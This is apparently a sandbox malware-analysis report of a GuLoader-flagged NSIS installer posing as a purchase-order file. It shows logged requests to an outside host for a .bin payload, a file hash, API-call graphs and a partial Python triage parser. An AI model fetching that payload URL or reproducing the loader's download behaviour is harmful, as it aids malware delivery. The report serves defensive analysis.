Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 50030 | 62.215.181.250 | 443 | | 
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:24 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:25 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:24 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 50031 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:39:26 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:39:27 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:39:26 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                    Target ID:0
                                                                    Start time:15:35:20
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
                                                                    Imagebase:0x400000
                                                                    File size:918'336 bytes
                                                                    MD5 hash:E7504A48D78545EF459890B5C36B6B17
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:15:37:16
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
                                                                    Imagebase:0x400000
                                                                    File size:918'336 bytes
                                                                    MD5 hash:E7504A48D78545EF459890B5C36B6B17
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:20.5%
                                                                      Dynamic/Decrypted Code Coverage:14.4%
                                                                      Signature Coverage:21.1%
                                                                      Total number of Nodes:1461
                                                                      Total number of Limit Nodes:40
                                                                      execution_graph: [node-and-edge listing of the interactive execution graph (function addresses, resolved API names and call edges); rendered graph view omitted]
4529->4535 4536 10001266 2 API calls 4529->4536 4575 100012d1 4529->4575 4530->4529 4531->4529 4532->4529 4533->4529 4534->4529 4535->4443 4536->4529 4579 10001215 GlobalAlloc 4538->4579 4540 1000155f 4542 10001586 4540->4542 4543 1000156c lstrcpyA 4540->4543 4544 100015a0 4542->4544 4545 1000158b wsprintfA 4542->4545 4543->4544 4546 10001266 4544->4546 4545->4544 4547 100012a8 GlobalFree 4546->4547 4548 1000126f GlobalAlloc lstrcpynA 4546->4548 4547->4448 4548->4547 4550 100017c5 4549->4550 4551 100023ae 4549->4551 4550->4462 4550->4463 4551->4550 4552 100023c7 GlobalFree 4551->4552 4552->4551 4554 10001266 2 API calls 4553->4554 4555 10001503 4554->4555 4555->4456 4556->4467 4557->4474 4559 10001552 4558->4559 4559->4496 4566 10001215 GlobalAlloc 4560->4566 4562 10001233 lstrcpynA 4562->4486 4563->4474 4564->4487 4565->4493 4566->4562 4568 100012b4 4567->4568 4569 10001224 2 API calls 4568->4569 4570 100012cf 4569->4570 4570->4506 4572 10002581 4571->4572 4573 1000252b VirtualAlloc 4571->4573 4572->4505 4573->4572 4574->4529 4576 100012f9 4575->4576 4577 100012da 4575->4577 4576->4529 4577->4576 4578 100012e0 lstrcpyA 4577->4578 4578->4576 4579->4540 5095 401490 5096 404f25 25 API calls 5095->5096 5097 401497 5096->5097 4642 401595 4643 402a3a 18 API calls 4642->4643 4644 40159c SetFileAttributesA 4643->4644 4645 4015ae 4644->4645 4651 402616 4652 40261d 4651->4652 4658 40287c 4651->4658 4653 402a1d 18 API calls 4652->4653 4654 402628 4653->4654 4655 40262f SetFilePointer 4654->4655 4656 40263f 4655->4656 4655->4658 4659 405c6a wsprintfA 4656->4659 4659->4658 5098 401717 5099 402a3a 18 API calls 5098->5099 5100 40171e SearchPathA 5099->5100 5101 401739 5100->5101 5102 10001058 5104 10001074 5102->5104 5103 100010dc 5104->5103 5105 100014bb GlobalFree 5104->5105 5106 10001091 5104->5106 5105->5106 5107 100014bb GlobalFree 5106->5107 5108 100010a1 5107->5108 5109 100010b1 5108->5109 5110 100010a8 GlobalSize 5108->5110 5111 100010b5 GlobalAlloc 5109->5111 5112 
100010c6 5109->5112 5110->5109 5113 100014e2 3 API calls 5111->5113 5114 100010d1 GlobalFree 5112->5114 5113->5112 5114->5103 5115 404e99 5116 404ea9 5115->5116 5117 404ebd 5115->5117 5118 404eaf 5116->5118 5127 404f06 5116->5127 5119 404ec5 IsWindowVisible 5117->5119 5123 404edc 5117->5123 5121 403f3d SendMessageA 5118->5121 5122 404ed2 5119->5122 5119->5127 5120 404f0b CallWindowProcA 5124 404eb9 5120->5124 5121->5124 5128 4047f0 SendMessageA 5122->5128 5123->5120 5133 404870 5123->5133 5127->5120 5129 404813 GetMessagePos ScreenToClient SendMessageA 5128->5129 5130 40484f SendMessageA 5128->5130 5131 404847 5129->5131 5132 40484c 5129->5132 5130->5131 5131->5123 5132->5130 5142 405d0c lstrcpynA 5133->5142 5135 404883 5143 405c6a wsprintfA 5135->5143 5137 40488d 5138 40140b 2 API calls 5137->5138 5139 404896 5138->5139 5144 405d0c lstrcpynA 5139->5144 5141 40489d 5141->5127 5142->5135 5143->5137 5144->5141 5145 402519 5146 40252e 5145->5146 5147 40251e 5145->5147 5149 402a3a 18 API calls 5146->5149 5148 402a1d 18 API calls 5147->5148 5151 402527 5148->5151 5150 402535 lstrlenA 5149->5150 5150->5151 5152 402557 5151->5152 5153 405a26 WriteFile 5151->5153 5153->5152 5154 40149d 5155 4014ab PostQuitMessage 5154->5155 5156 40226e 5154->5156 5155->5156 4675 403a1e 4676 403b71 4675->4676 4677 403a36 4675->4677 4679 403b82 GetDlgItem GetDlgItem 4676->4679 4680 403bc2 4676->4680 4677->4676 4678 403a42 4677->4678 4682 403a60 4678->4682 4683 403a4d SetWindowPos 4678->4683 4684 403ef1 19 API calls 4679->4684 4681 403c1c 4680->4681 4692 401389 2 API calls 4680->4692 4686 403f3d SendMessageA 4681->4686 4693 403b6c 4681->4693 4687 403a65 ShowWindow 4682->4687 4688 403a7d 4682->4688 4683->4682 4685 403bac SetClassLongA 4684->4685 4689 40140b 2 API calls 4685->4689 4713 403c2e 4686->4713 4687->4688 4690 403a85 DestroyWindow 4688->4690 4691 403a9f 4688->4691 4689->4680 4694 403e7a 4690->4694 4695 403aa4 SetWindowLongA 4691->4695 4696 403ab5 4691->4696 4697 403bf4 4692->4697 
4694->4693 4706 403eab ShowWindow 4694->4706 4695->4693 4699 403ac1 GetDlgItem 4696->4699 4700 403b5e 4696->4700 4697->4681 4701 403bf8 SendMessageA 4697->4701 4698 403e7c DestroyWindow EndDialog 4698->4694 4703 403af1 4699->4703 4704 403ad4 SendMessageA IsWindowEnabled 4699->4704 4705 403f58 8 API calls 4700->4705 4701->4693 4702 40140b 2 API calls 4702->4713 4708 403afe 4703->4708 4710 403b45 SendMessageA 4703->4710 4711 403b11 4703->4711 4719 403af6 4703->4719 4704->4693 4704->4703 4705->4693 4706->4693 4707 405d2e 18 API calls 4707->4713 4708->4710 4708->4719 4709 403eca SendMessageA 4712 403b2c 4709->4712 4710->4700 4714 403b19 4711->4714 4715 403b2e 4711->4715 4712->4700 4713->4693 4713->4698 4713->4702 4713->4707 4716 403ef1 19 API calls 4713->4716 4721 403ef1 19 API calls 4713->4721 4736 403dbc DestroyWindow 4713->4736 4718 40140b 2 API calls 4714->4718 4717 40140b 2 API calls 4715->4717 4716->4713 4720 403b35 4717->4720 4718->4719 4719->4709 4720->4700 4720->4719 4722 403ca9 GetDlgItem 4721->4722 4723 403cc6 ShowWindow KiUserCallbackDispatcher 4722->4723 4724 403cbe 4722->4724 4745 403f13 KiUserCallbackDispatcher 4723->4745 4724->4723 4726 403cf0 EnableWindow 4729 403d04 4726->4729 4727 403d09 GetSystemMenu EnableMenuItem SendMessageA 4728 403d39 SendMessageA 4727->4728 4727->4729 4728->4729 4729->4727 4746 403f26 SendMessageA 4729->4746 4747 405d0c lstrcpynA 4729->4747 4732 403d67 lstrlenA 4733 405d2e 18 API calls 4732->4733 4734 403d78 SetWindowTextA 4733->4734 4735 401389 2 API calls 4734->4735 4735->4713 4736->4694 4737 403dd6 CreateDialogParamA 4736->4737 4737->4694 4738 403e09 4737->4738 4739 403ef1 19 API calls 4738->4739 4740 403e14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4739->4740 4741 401389 2 API calls 4740->4741 4742 403e5a 4741->4742 4742->4693 4743 403e62 ShowWindow 4742->4743 4744 403f3d SendMessageA 4743->4744 4744->4694 4745->4726 4746->4729 4747->4732 5157 100010e0 5166 1000110e 5157->5166 5158 100011c4 GlobalFree 5159 
100012ad 2 API calls 5159->5166 5160 100011c3 5160->5158 5161 10001266 2 API calls 5165 100011b1 GlobalFree 5161->5165 5162 10001155 GlobalAlloc 5162->5166 5163 100011ea GlobalFree 5163->5166 5164 100012d1 lstrcpyA 5164->5166 5165->5166 5166->5158 5166->5159 5166->5160 5166->5161 5166->5162 5166->5163 5166->5164 5166->5165 5167 4048a2 GetDlgItem GetDlgItem 5168 4048f4 7 API calls 5167->5168 5176 404b0c 5167->5176 5169 404997 DeleteObject 5168->5169 5170 40498a SendMessageA 5168->5170 5171 4049a0 5169->5171 5170->5169 5173 4049d7 5171->5173 5175 405d2e 18 API calls 5171->5175 5172 404bf0 5174 404c9c 5172->5174 5183 404c49 SendMessageA 5172->5183 5209 404aff 5172->5209 5177 403ef1 19 API calls 5173->5177 5179 404ca6 SendMessageA 5174->5179 5180 404cae 5174->5180 5181 4049b9 SendMessageA SendMessageA 5175->5181 5176->5172 5186 4047f0 5 API calls 5176->5186 5210 404b7d 5176->5210 5178 4049eb 5177->5178 5182 403ef1 19 API calls 5178->5182 5179->5180 5191 404cc0 ImageList_Destroy 5180->5191 5192 404cc7 5180->5192 5202 404cd7 5180->5202 5181->5171 5187 4049f9 5182->5187 5189 404c5e SendMessageA 5183->5189 5183->5209 5184 403f58 8 API calls 5190 404e92 5184->5190 5185 404be2 SendMessageA 5185->5172 5186->5210 5194 404acd GetWindowLongA SetWindowLongA 5187->5194 5201 404a48 SendMessageA 5187->5201 5204 404ac7 5187->5204 5206 404a84 SendMessageA 5187->5206 5207 404a95 SendMessageA 5187->5207 5188 404e46 5196 404e58 ShowWindow GetDlgItem ShowWindow 5188->5196 5188->5209 5195 404c71 5189->5195 5191->5192 5193 404cd0 GlobalFree 5192->5193 5192->5202 5193->5202 5197 404ae6 5194->5197 5203 404c82 SendMessageA 5195->5203 5196->5209 5198 404b04 5197->5198 5199 404aec ShowWindow 5197->5199 5219 403f26 SendMessageA 5198->5219 5218 403f26 SendMessageA 5199->5218 5201->5187 5202->5188 5208 404870 4 API calls 5202->5208 5214 404d12 5202->5214 5203->5174 5204->5194 5204->5197 5206->5187 5207->5187 5208->5214 5209->5184 5210->5172 5210->5185 5211 404e1c InvalidateRect 5211->5188 5212 
404e32 5211->5212 5220 4047ab 5212->5220 5213 404d40 SendMessageA 5217 404d56 5213->5217 5214->5213 5214->5217 5216 404dca SendMessageA SendMessageA 5216->5217 5217->5211 5217->5216 5218->5209 5219->5176 5223 4046e6 5220->5223 5222 4047c0 5222->5188 5224 4046fc 5223->5224 5225 405d2e 18 API calls 5224->5225 5226 404760 5225->5226 5227 405d2e 18 API calls 5226->5227 5228 40476b 5227->5228 5229 405d2e 18 API calls 5228->5229 5230 404781 lstrlenA wsprintfA SetDlgItemTextA 5229->5230 5230->5222 5231 10002162 5232 100021c0 5231->5232 5233 100021f6 5231->5233 5232->5233 5234 100021d2 GlobalAlloc 5232->5234 5234->5232 5235 401ca7 5236 402a1d 18 API calls 5235->5236 5237 401cae 5236->5237 5238 402a1d 18 API calls 5237->5238 5239 401cb6 GetDlgItem 5238->5239 5240 402513 5239->5240 4009 40192a 4010 40192c 4009->4010 4011 402a3a 18 API calls 4010->4011 4012 401931 4011->4012 4015 4055ae 4012->4015 4055 40586c 4015->4055 4018 4055d6 DeleteFileA 4020 40193a 4018->4020 4019 4055ed 4021 40571b 4019->4021 4069 405d0c lstrcpynA 4019->4069 4021->4020 4087 406010 FindFirstFileA 4021->4087 4023 405613 4024 405626 4023->4024 4025 405619 lstrcatA 4023->4025 4070 4057c5 lstrlenA 4024->4070 4026 40562c 4025->4026 4030 40563a lstrcatA 4026->4030 4032 405645 lstrlenA FindFirstFileA 4026->4032 4030->4032 4031 405743 4090 40577e lstrlenA CharPrevA 4031->4090 4032->4021 4043 405669 4032->4043 4035 4057a9 CharNextA 4035->4043 4036 405566 5 API calls 4037 405755 4036->4037 4038 405759 4037->4038 4039 40576f 4037->4039 4038->4020 4045 404f25 25 API calls 4038->4045 4042 404f25 25 API calls 4039->4042 4040 4056fa FindNextFileA 4040->4043 4044 405712 FindClose 4040->4044 4042->4020 4043->4035 4043->4040 4052 4056bb 4043->4052 4074 405d0c lstrcpynA 4043->4074 4044->4021 4046 405766 4045->4046 4047 405bc7 38 API calls 4046->4047 4050 40576d 4047->4050 4049 4055ae 62 API calls 4049->4052 4050->4020 4051 404f25 25 API calls 4051->4040 4052->4040 4052->4049 4052->4051 4053 404f25 25 API calls 4052->4053 
4075 405566 4052->4075 4083 405bc7 MoveFileExA 4052->4083 4053->4052 4093 405d0c lstrcpynA 4055->4093 4057 40587d 4094 405817 CharNextA CharNextA 4057->4094 4060 4055ce 4060->4018 4060->4019 4061 405f77 5 API calls 4067 405893 4061->4067 4062 4058be lstrlenA 4063 4058c9 4062->4063 4062->4067 4065 40577e 3 API calls 4063->4065 4064 406010 2 API calls 4064->4067 4066 4058ce GetFileAttributesA 4065->4066 4066->4060 4067->4060 4067->4062 4067->4064 4068 4057c5 2 API calls 4067->4068 4068->4062 4069->4023 4071 4057d2 4070->4071 4072 4057e3 4071->4072 4073 4057d7 CharPrevA 4071->4073 4072->4026 4073->4071 4073->4072 4074->4043 4100 40595a GetFileAttributesA 4075->4100 4078 405581 RemoveDirectoryA 4080 40558f 4078->4080 4079 405589 DeleteFileA 4079->4080 4081 405593 4080->4081 4082 40559f SetFileAttributesA 4080->4082 4081->4052 4082->4081 4084 405bdb 4083->4084 4086 405be8 4083->4086 4103 405a55 lstrcpyA 4084->4103 4086->4052 4088 40573f 4087->4088 4089 406026 FindClose 4087->4089 4088->4020 4088->4031 4089->4088 4091 405749 4090->4091 4092 405798 lstrcatA 4090->4092 4091->4036 4092->4091 4093->4057 4095 405842 4094->4095 4096 405832 4094->4096 4098 4057a9 CharNextA 4095->4098 4099 405862 4095->4099 4096->4095 4097 40583d CharNextA 4096->4097 4097->4099 4098->4095 4099->4060 4099->4061 4101 405572 4100->4101 4102 40596c SetFileAttributesA 4100->4102 4101->4078 4101->4079 4101->4081 4102->4101 4104 405aa3 GetShortPathNameA 4103->4104 4105 405a7d 4103->4105 4107 405bc2 4104->4107 4108 405ab8 4104->4108 4130 40597f GetFileAttributesA CreateFileA 4105->4130 4107->4086 4108->4107 4110 405ac0 wsprintfA 4108->4110 4109 405a87 CloseHandle GetShortPathNameA 4109->4107 4111 405a9b 4109->4111 4112 405d2e 18 API calls 4110->4112 4111->4104 4111->4107 4113 405ae8 4112->4113 4131 40597f GetFileAttributesA CreateFileA 4113->4131 4115 405af5 4115->4107 4116 405b04 GetFileSize GlobalAlloc 4115->4116 4117 405b26 4116->4117 4118 405bbb CloseHandle 4116->4118 4119 4059f7 ReadFile 4117->4119 
4118->4107 4120 405b2e 4119->4120 4120->4118 4132 4058e4 lstrlenA 4120->4132 4123 405b45 lstrcpyA 4126 405b67 4123->4126 4124 405b59 4125 4058e4 4 API calls 4124->4125 4125->4126 4127 405b9e SetFilePointer 4126->4127 4128 405a26 WriteFile 4127->4128 4129 405bb4 GlobalFree 4128->4129 4129->4118 4130->4109 4131->4115 4133 405925 lstrlenA 4132->4133 4134 4058fe lstrcmpiA 4133->4134 4135 40592d 4133->4135 4134->4135 4136 40591c CharNextA 4134->4136 4135->4123 4135->4124 4136->4133 5241 4028aa SendMessageA 5242 4028c4 InvalidateRect 5241->5242 5243 4028cf 5241->5243 5242->5243 5244 40432f 5245 40435b 5244->5245 5246 40436c 5244->5246 5305 4054e6 GetDlgItemTextA 5245->5305 5248 404378 GetDlgItem 5246->5248 5249 4043d7 5246->5249 5252 40438c 5248->5252 5250 4044bb 5249->5250 5259 405d2e 18 API calls 5249->5259 5303 404665 5249->5303 5250->5303 5307 4054e6 GetDlgItemTextA 5250->5307 5251 404366 5253 405f77 5 API calls 5251->5253 5254 4043a0 SetWindowTextA 5252->5254 5257 405817 4 API calls 5252->5257 5253->5246 5258 403ef1 19 API calls 5254->5258 5256 403f58 8 API calls 5261 404679 5256->5261 5262 404396 5257->5262 5263 4043bc 5258->5263 5264 40444b SHBrowseForFolderA 5259->5264 5260 4044eb 5265 40586c 18 API calls 5260->5265 5262->5254 5269 40577e 3 API calls 5262->5269 5266 403ef1 19 API calls 5263->5266 5264->5250 5267 404463 CoTaskMemFree 5264->5267 5268 4044f1 5265->5268 5270 4043ca 5266->5270 5271 40577e 3 API calls 5267->5271 5308 405d0c lstrcpynA 5268->5308 5269->5254 5306 403f26 SendMessageA 5270->5306 5273 404470 5271->5273 5276 4044a7 SetDlgItemTextA 5273->5276 5280 405d2e 18 API calls 5273->5280 5275 4043d0 5278 4060a5 5 API calls 5275->5278 5276->5250 5277 404508 5279 4060a5 5 API calls 5277->5279 5278->5249 5286 40450f 5279->5286 5282 40448f lstrcmpiA 5280->5282 5281 40454b 5309 405d0c lstrcpynA 5281->5309 5282->5276 5283 4044a0 lstrcatA 5282->5283 5283->5276 5285 404552 5287 405817 4 API calls 5285->5287 5286->5281 5291 4057c5 2 API calls 5286->5291 5292 
4045a3 5286->5292 5288 404558 GetDiskFreeSpaceA 5287->5288 5290 40457c MulDiv 5288->5290 5288->5292 5290->5292 5291->5286 5293 404614 5292->5293 5295 4047ab 21 API calls 5292->5295 5294 404637 5293->5294 5296 40140b 2 API calls 5293->5296 5310 403f13 KiUserCallbackDispatcher 5294->5310 5297 404601 5295->5297 5296->5294 5299 404616 SetDlgItemTextA 5297->5299 5300 404606 5297->5300 5299->5293 5302 4046e6 21 API calls 5300->5302 5301 404653 5301->5303 5311 4042c4 5301->5311 5302->5293 5303->5256 5305->5251 5306->5275 5307->5260 5308->5277 5309->5285 5310->5301 5312 4042d2 5311->5312 5313 4042d7 SendMessageA 5311->5313 5312->5313 5313->5303 4622 4015b3 4623 402a3a 18 API calls 4622->4623 4624 4015ba 4623->4624 4625 405817 4 API calls 4624->4625 4637 4015c2 4625->4637 4626 40161c 4628 401621 4626->4628 4629 40164a 4626->4629 4627 4057a9 CharNextA 4627->4637 4630 401423 25 API calls 4628->4630 4631 401423 25 API calls 4629->4631 4632 401628 4630->4632 4638 401642 4631->4638 4641 405d0c lstrcpynA 4632->4641 4634 405468 2 API calls 4634->4637 4635 405485 5 API calls 4635->4637 4636 401633 SetCurrentDirectoryA 4636->4638 4637->4626 4637->4627 4637->4634 4637->4635 4639 401604 GetFileAttributesA 4637->4639 4640 4053eb 4 API calls 4637->4640 4639->4637 4640->4637 4641->4636 5314 4016b3 5315 402a3a 18 API calls 5314->5315 5316 4016b9 GetFullPathNameA 5315->5316 5317 4016d0 5316->5317 5318 4016f1 5316->5318 5317->5318 5321 406010 2 API calls 5317->5321 5319 401705 GetShortPathNameA 5318->5319 5320 4028cf 5318->5320 5319->5320 5322 4016e1 5321->5322 5322->5318 5324 405d0c lstrcpynA 5322->5324 5324->5318 5325 4014b7 5326 4014bd 5325->5326 5327 401389 2 API calls 5326->5327 5328 4014c5 5327->5328 5329 401d38 GetDC GetDeviceCaps 5330 402a1d 18 API calls 5329->5330 5331 401d56 MulDiv ReleaseDC 5330->5331 5332 402a1d 18 API calls 5331->5332 5333 401d75 5332->5333 5334 405d2e 18 API calls 5333->5334 5335 401dae CreateFontIndirectA 5334->5335 5336 402513 5335->5336 5337 40403a 5338 
404050 5337->5338 5343 40415c 5337->5343 5341 403ef1 19 API calls 5338->5341 5339 4041cb 5340 40429f 5339->5340 5342 4041d5 GetDlgItem 5339->5342 5348 403f58 8 API calls 5340->5348 5344 4040a6 5341->5344 5345 4041eb 5342->5345 5346 40425d 5342->5346 5343->5339 5343->5340 5347 4041a0 GetDlgItem SendMessageA 5343->5347 5349 403ef1 19 API calls 5344->5349 5345->5346 5353 404211 6 API calls 5345->5353 5346->5340 5350 40426f 5346->5350 5368 403f13 KiUserCallbackDispatcher 5347->5368 5358 40429a 5348->5358 5352 4040b3 CheckDlgButton 5349->5352 5354 404275 SendMessageA 5350->5354 5355 404286 5350->5355 5366 403f13 KiUserCallbackDispatcher 5352->5366 5353->5346 5354->5355 5355->5358 5359 40428c SendMessageA 5355->5359 5356 4041c6 5360 4042c4 SendMessageA 5356->5360 5359->5358 5360->5339 5361 4040d1 GetDlgItem 5367 403f26 SendMessageA 5361->5367 5363 4040e7 SendMessageA 5364 404105 GetSysColor 5363->5364 5365 40410e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5363->5365 5364->5365 5365->5358 5366->5361 5367->5363 5368->5356 4748 40173e 4749 402a3a 18 API calls 4748->4749 4750 401745 4749->4750 4751 4059ae 2 API calls 4750->4751 4752 40174c 4751->4752 4753 4059ae 2 API calls 4752->4753 4753->4752 5369 401ebe 5370 402a3a 18 API calls 5369->5370 5371 401ec5 5370->5371 5372 406010 2 API calls 5371->5372 5373 401ecb 5372->5373 5375 401edd 5373->5375 5376 405c6a wsprintfA 5373->5376 5376->5375 5377 40193f 5378 402a3a 18 API calls 5377->5378 5379 401946 lstrlenA 5378->5379 5380 402513 5379->5380

                                                                      Control-flow Graph

                                                                      [Function 004030EC, the installer's entry routine. The basic-block graph and its executed/not-executed colouring are rendered only in the interactive report. Blocks in the graph reference, in address order: SetErrorMode, GetVersion, resolution through 004060A5 (GetModuleHandleA/GetProcAddress), lstrlenA, COMCTL32 ordinal #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, GetModuleHandleA, CharNextA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, SetEnvironmentVariableA (twice), DeleteFileA, OleUninitialize, a MessageBoxIndirectA path through 00405502, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, SetCurrentDirectoryA, CopyFileA and CloseHandle. The APIs list below gives the arguments for the calls that were recorded.]
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 00403111
                                                                      • GetVersion.KERNEL32 ref: 00403117
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                      • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                      • OleInitialize.OLE32(00000000), ref: 00403169
                                                                      • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                      • GetCommandLineA.KERNEL32(Regangen Setup,NSIS Error), ref: 0040319A
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000000), ref: 004031AD
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000020), ref: 004031D8
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032E6
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F2
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403306
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330E
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040331F
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403327
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 0040333B
                                                                        • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                        • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                      • OleUninitialize.OLE32(?), ref: 004033E9
                                                                      • ExitProcess.KERNEL32 ref: 0040340A
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                      • ExitProcess.KERNEL32 ref: 004035AC
                                                                        • Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D
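The listing above is the most useful part of this function's record for triage: it shows the stub redirecting TEMP and TMP, resolving imports through GetModuleHandleA/GetProcAddress in subroutine 004060A5, and enabling SeShutdownPrivilege on its own token before calling ExitWindowsEx, which is the likely basis for the report's "Contains functionality to shutdown / reboot the system" and "dynamically determine API calls" signatures. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in this "APIs" format into records and runs three checks a reviewer would want, requiring the privilege chain to appear in address order so that a lone ExitWindowsEx import does not fire. The sample input is a constructed subset of the lines above; the EWX_* flag values are the documented Win32 constants.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: a subset of the 004030EC "APIs" lines from the report,
# copied verbatim (indented lines are calls made inside a subroutine).
SAMPLE_APIS = """\
• SetErrorMode.KERNELBASE ref: 00403111
• GetVersion.KERNEL32 ref: 00403117
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
• #17.COMCTL32(00000007,00000009), ref: 00403162
• OleInitialize.OLE32(00000000), ref: 00403169
• GetCommandLineA.KERNEL32(Regangen Setup,NSIS Error), ref: 0040319A
• GetModuleHandleA.KERNEL32(00000000,"C:\\Users\\user\\Desktop\\PO-10212024168877 PNG2023-W101.exe",00000000), ref: 004031AD
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,Low), ref: 0040331F
• SetEnvironmentVariableA.KERNEL32(TMP,C:\\Users\\user\\AppData\\Local\\Temp\\), ref: 00403327
• DeleteFileA.KERNELBASE(1033), ref: 0040333B
  • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
  • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
• OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
• ExitProcess.KERNEL32 ref: 004035AC
"""

# One bullet line: optional "Part of subcall function XXXXXXXX:" prefix,
# then API.MODULE, optional (args), then "ref: ADDRESS".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the report's bullet lines into records; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
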